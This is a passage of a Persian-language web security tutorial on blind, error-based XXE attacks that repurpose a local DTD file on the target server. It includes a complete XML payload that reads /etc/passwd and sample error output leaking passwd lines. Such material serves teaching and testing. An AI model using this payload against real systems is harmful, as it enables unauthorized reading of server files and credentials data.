\u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0627\u0646\u062a\u06cc\u062a\u06cc error \u0628\u0647 \u0635\u0648\u0631\u062a \u062f\u06cc\u0646\u0627\u0645\u06cc\u06a9 \u062a\u0639\u0631\u06cc\u0641 \u0634\u0648\u062f.<\/li><li>\u0627\u0646\u062a\u06cc\u062a\u06cc error \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f\u061b \u0628\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc error\u060c \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0633\u0639\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u0641\u0627\u06cc\u0644\u06cc \u0631\u0627 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0646\u062f \u06a9\u0647 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f. \u0627\u06cc\u0646 \u0645\u0633\u0627\u0644\u0647 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0627\u06cc\u062c\u0627\u062f \u0634\u0648\u062f \u06a9\u0647 \u0646\u0627\u0645 \u0641\u0627\u06cc\u0644 \u0646\u0627\u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0622\u0646 \u0622\u0645\u062f\u0647 \u0627\u0633\u062a. \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u0627\u0634\u0627\u0631\u0647 \u06a9\u0631\u062f\u06cc\u0645\u060c \u0646\u0627\u0645 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 \u0646\u0627\u0645\u0648\u062c\u0648\u062f \u0647\u0645 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0628\u0648\u062f.<\/li><\/ul><p>\u0627\u062c\u0631\u0627\u06cc DTD \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0645\u0627\u0646\u0646\u062f \u067e\u06cc\u0627\u0645 \u0632\u06cc\u0631 \u062a\u0648\u0644\u06cc\u062f \u0634\u0648\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c39cf5f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c39cf5f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-086a95f\" data-id=\"086a95f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-be1e9ae elementor-widget elementor-widget-text-editor\" data-id=\"be1e9ae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>java.io.FileNotFoundException: \/nonexistent\/root:x:0:0:root:\/root:\/bin\/bash <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-07a8472 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"07a8472\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-419a492\" data-id=\"419a492\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9c0affb elementor-widget elementor-widget-text-editor\" data-id=\"9c0affb\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h4 id=\"local-dtd\"><span style=\"font-size: 12pt;\">\u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a Blind XXE \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u063a\u06cc\u0631 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u0632 \u06cc\u06a9 DTD \u0645\u062d\u0644\u06cc<\/span><\/h4>\n\u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc \u0628\u0631\u0627\u06cc DTD \u062e\u0627\u0631\u062c\u06cc \u0628\u0647 \u062e\u0648\u0628\u06cc \u06a9\u0627\u0631 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f\u060c \u0648\u0644\u06cc \u0645\u0639\u0645\u0648\u0644\u0627 \u0628\u0631\u0627\u06cc \u06cc\u06a9 DTD \u062f\u0627\u062e\u0644\u06cc \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062f\u0631 \u062a\u06af DOCTYPE \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u062c\u0648\u0627\u0628 \u0646\u0645\u06cc\u200c\u062f\u0647\u0646\u062f. \u062f\u0644\u06cc\u0644 \u0622\u0646 \u0647\u0645 \u0627\u06cc\u0646 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u060c \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f (\u0645\u062b\u0644\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 %file \u062f\u0631 \u0627\u0646\u062a\u0647\u0627\u06cc URL \u06cc\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 %file \u062f\u0631 \u0627\u0646\u062a\u0647\u0627\u06cc \u0622\u062f\u0631\u0633 \u062a\u0639\u06cc\u06cc\u0646\u200c\u0634\u062f\u0647 \u062f\u0631 \u067e\u0631\u0648\u062a\u06a9\u0644 file:\/\/). \u062f\u0631 \u0632\u0628\u0627\u0646 XML\u060c \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u062f\u0631 DTD\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0645\u062c\u0627\u0632 \u0627\u0633\u062a \u0648\u0644\u06cc \u062f\u0631 DTD\u0647\u0627\u06cc \u062f\u0627\u062e\u0644\u06cc \u0645\u062c\u0627\u0632 \u0646\u06cc\u0633\u062a (\u0627\u0644\u0628\u062a\u0647 \u0628\u0639\u0636\u06cc \u067e\u0627\u0631\u0633\u0631\u0647\u0627 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u0627 \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u0634\u06a9\u0644\u06cc \u0646\u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f\u060c \u0648\u0644\u06cc \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u067e\u0627\u0631\u0633\u0631\u0647\u0627 \u0622\u0646 \u0631\u0627 \u0642\u0628\u0648\u0644 \u0646\u0645\u06cc\u200c\u06a9\u0646\u0646\u062f).\n\n\u062d\u0627\u0644\u0627 \u0627\u06af\u0631 \u0627\u0631\u062a\u0628\u0627\u0637\u0627\u062a out-of-band \u0628\u0644\u0627\u06a9 \u0634\u062f\u0647 \u0628\u0648\u062f \u0686\u0647 \u06a9\u0646\u06cc\u0645\u061f \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0645\u0648\u0627\u0642\u0639\u06cc \u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u062f\u0627\u062f\u0647 \u0631\u0627 \u0627\u0632 \u0627\u062a\u0635\u0627\u0644 out-of-band \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u06a9\u0631\u062f\u060c \u0646\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06cc\u06a9 DTD \u0627\u06a9\u0633\u062a\u0631\u0646\u0627\u0644 \u0631\u0627 \u0627\u0632 \u0631\u0648\u06cc \u06cc\u06a9 \u0633\u0631\u0648\u0631 \u062e\u0627\u0631\u062c\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f. \u0631\u0627\u0647 \u062d\u0644 \u0686\u06cc\u0633\u062a\u061f\n\u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc\u060c \u0628\u0647 \u062e\u0627\u0637\u0631 \u06cc\u06a9 \u0627\u0633\u062a\u062b\u0646\u0627 \u062f\u0631 \u0632\u0628\u0627\u0646 XML\u060c \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0647\u0645\u200c\u0686\u0646\u0627\u0646 \u0628\u062a\u0648\u0627\u0646 \u067e\u06cc\u0627\u0645\u200e\u200c\u0647\u0627\u06cc \u062e\u0637\u0627\u06cc\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0628\u0627\u0634\u0646\u062f. \u062d\u0627\u0644 \u0627\u06cc\u0646 \u0627\u0633\u062a\u062b\u0646\u0627 \u0686\u06cc\u0633\u062a\u061f \u0627\u06af\u0631 \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 DTD \u06cc\u06a9 \u0633\u0646\u062f XML\u060c \u062a\u0631\u06a9\u06cc\u0628\u06cc \u0627\u0632 \u06cc\u06a9 DTD \u062f\u0627\u062e\u0644\u06cc \u0648 \u06cc\u06a9 DTD \u062e\u0627\u0631\u062c\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f\u060c \u062f\u0631 \u0627\u06cc\u0646 \u0635\u0648\u0631\u062a DTD \u062f\u0627\u062e\u0644\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u062f\u0631 DTD \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u062f. \u0648\u0642\u062a\u06cc \u0627\u06cc\u0646 \u0627\u062a\u0641\u0627\u0642 \u0645\u06cc\u200c\u0627\u0641\u062a\u062f\u060c \u0645\u062d\u062f\u0648\u062f\u06cc\u062a \u0639\u062f\u0645 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u0627\u062e\u0644 \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u062f\u06cc\u06af\u0631\u060c \u0628\u0631\u062f\u0627\u0634\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\u0627\u06cc\u0646 \u06cc\u0639\u0646\u06cc \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u062a\u06a9\u0646\u06cc\u06a9 XXE \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0627\u0631\u0648\u0631 \u062f\u0631 \u06cc\u06a9 DTD \u062f\u0627\u062e\u0644\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f\u060c \u0648\u0644\u06cc \u0641\u0642\u0637 \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u06a9\u0647 \u0642\u0635\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u0631\u0627 \u062f\u0627\u0631\u062f\u060c \u062f\u0627\u062e\u0644 \u06cc\u06a9 DTD \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f \u0648 DTD \u062f\u0627\u062e\u0644\u06cc \u062f\u0648\u0628\u0627\u0631\u0647 \u0622\u0646 \u0631\u0627 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u062f. \u0627\u0644\u0628\u062a\u0647 \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u06af\u0641\u062a\u06cc\u0645\u060c \u0627\u06cc\u0646 \u0631\u0627\u0647 \u062d\u0644 \u0628\u0631\u0627\u06cc \u0632\u0645\u0627\u0646\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0627\u062a\u0635\u0627\u0644\u0627\u062a out-of-band \u0628\u0644\u0627\u06a9 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0646\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 External DTD \u0631\u0627 \u0627\u0632 \u06cc\u06a9 \u0633\u0631\u0648\u0631 \u062e\u0627\u0631\u062c\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f. \u062f\u0631 \u0639\u0648\u0636\u060c \u0628\u0627\u06cc\u062f \u0641\u0627\u06cc\u0644 DTD \u062e\u0627\u0631\u062c\u06cc \u0631\u0627 \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646\u060c \u06cc\u06a9 \u0622\u062f\u0631\u0633 \u0644\u0648\u06a9\u0627\u0644 \u0645\u062d\u0633\u0648\u0628 \u0634\u0648\u062f. \u06cc\u0639\u0646\u06cc \u0627\u0633\u0627\u0633\u0627 \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0647 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u0631\u0627 \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0645\u062d\u0644\u06cc \u0633\u0631\u0648\u0631 \u0647\u062f\u0641 \u067e\u06cc\u062f\u0627 \u06a9\u0631\u062f\u060c \u0633\u067e\u0633 \u06cc\u06a9\u06cc \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u0627\u0632 \u0642\u0628\u0644 \u062f\u0631\u0648\u0646 \u0622\u0646 \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0628\u0647 \u06af\u0648\u0646\u0647\u200c\u0627\u06cc \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u062d\u0627\u0648\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0634\u0648\u062f.\n\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0641\u0631\u0636 \u06a9\u0646\u06cc\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0633\u0631\u0648\u0631 \u0648 \u062f\u0631 \u0622\u062f\u0631\u0633 \/usr\/local\/app\/schema.dtd \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f\u060c \u0648 \u062f\u0631 \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 DTD\u060c \u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0628\u0647 \u0646\u0627\u0645 custom_entity \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0627\u0633\u062a. \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627 \u062b\u0628\u062a \u06cc\u06a9 DTD \u062a\u0631\u06a9\u06cc\u0628\u06cc \u06cc\u0627 Hybrid DTD \u0628\u0647 \u0634\u06a9\u0644 \u0632\u06cc\u0631\u060c \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 Parsing Error \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0634\u0648\u062f:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d4894cf elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d4894cf\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-756b872\" data-id=\"756b872\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e5e3b88 elementor-widget elementor-widget-text-editor\" data-id=\"e5e3b88\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p dir=\"ltr\" style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong> &lt;!DOCTYPE foo [ <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY % local_dtd SYSTEM &#8220;file:\/\/\/usr\/local\/app\/schema.dtd&#8221;&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY % custom_entity &#8216; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY &amp;#x25; file SYSTEM &#8220;file:\/\/\/etc\/passwd&#8221;&gt; <\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&lt;!ENTITY &amp;#x25; eval &#8220;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:\/\/\/nonexistent\/&amp;#x25;file;&amp;#x27;&gt;&#8221;&gt;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&amp;#x25;eval;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&amp;#x25;error;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>&#8216;&gt;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>%local_dtd;<\/strong><\/span><br \/><span style=\"color: #ffffff;\"><strong>]&gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-c66a31a elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"c66a31a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d217d96\" data-id=\"d217d96\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8bc37f3 elementor-widget elementor-widget-text-editor\" data-id=\"8bc37f3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 DTD \u0645\u0631\u0627\u062d\u0644 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2859d6c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2859d6c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-9d37d51\" data-id=\"9d37d51\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-b64fb70 elementor-widget elementor-widget-text-editor\" data-id=\"b64fb70\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<ul><li><span style=\"font-size: 10pt;\"><strong>\u06cc\u06a9 \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0646\u0627\u0645 local_dtd \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 DTD \u062e\u0627\u0631\u062c\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0627\u0632 \u0642\u0628\u0644 \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644\u200c\u0633\u06cc\u0633\u062a\u0645 \u0633\u0631\u0648\u0631 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f. \u0627\u0646\u062a\u06cc\u062a\u06cc \u067e\u0627\u0631\u0627\u0645\u062a\u0631\u06cc \u0628\u0647 \u0646\u0627\u0645 custom_entity \u0631\u0627 \u06a9\u0647 \u0642\u0628\u0644\u0627 \u0631\u0648\u06cc \u0641\u0627\u06cc\u0644 DTD \u062e\u0627\u0631\u062c\u06cc \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647 \u0628\u0648\u062f\u060c \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u062f\u0631 \u062a\u0639\u0631\u06cc\u0641 \u0645\u062c\u062f\u062f \u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u060c \u06cc\u06a9 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a XXE \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0627\u0631\u0648\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u062f\u0631 \u0628\u062e\u0634\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc \u062a\u0648\u0636\u06cc\u062d\u0627\u062a \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0622\u0646 \u0622\u0645\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u062d\u0627\u0648\u06cc \u0645\u062d\u062a\u0648\u06cc\u0627\u062a \u0641\u0627\u06cc\u0644 \/etc\/passwd \u0627\u0633\u062a.<\/strong><\/span><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-ad36f38\" data-id=\"ad36f38\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a745c57 elementor-widget elementor-widget-text-editor\" data-id=\"a745c57\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<ul><li><span style=\"font-size: 10pt;\"><strong>\u0627\u0646\u062a\u06cc\u062a\u06cc local_dtd \u0631\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0628\u0627 \u0627\u06cc\u0646 \u06a9\u0627\u0631 DTD \u062e\u0627\u0631\u062c\u06cc \u062a\u0641\u0633\u06cc\u0631 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0634\u0627\u0645\u0644 \u0627\u0646\u062a\u06cc\u062a\u06cc custom_entity \u0627\u0633\u062a \u06a9\u0647 \u0622\u0646 \u0631\u0627 \u062f\u0648\u0628\u0627\u0631\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0631\u062f\u0647\u200c\u0627\u06cc\u0645. \u067e\u0633 \u0628\u0627 \u0641\u0631\u0627\u062e\u0648\u0627\u0646\u06cc local_dtd\u060c \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627\u06cc\u06cc \u06a9\u0647 \u0628\u0647 \u062f\u0646\u0628\u0627\u0644 \u0622\u0646 \u0628\u0648\u062f\u06cc\u0645 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f.<\/strong><\/span><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3a8c56f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3a8c56f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b63755d\" data-id=\"b63755d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-14ffbb3 elementor-widget elementor-widget-text-editor\" data-id=\"14ffbb3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h5 id=\"find-local-dtd\"><span style=\"font-size: 12pt;\">\u06cc\u0627\u0641\u062a\u0646 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 DTD \u0645\u062d\u0644\u06cc 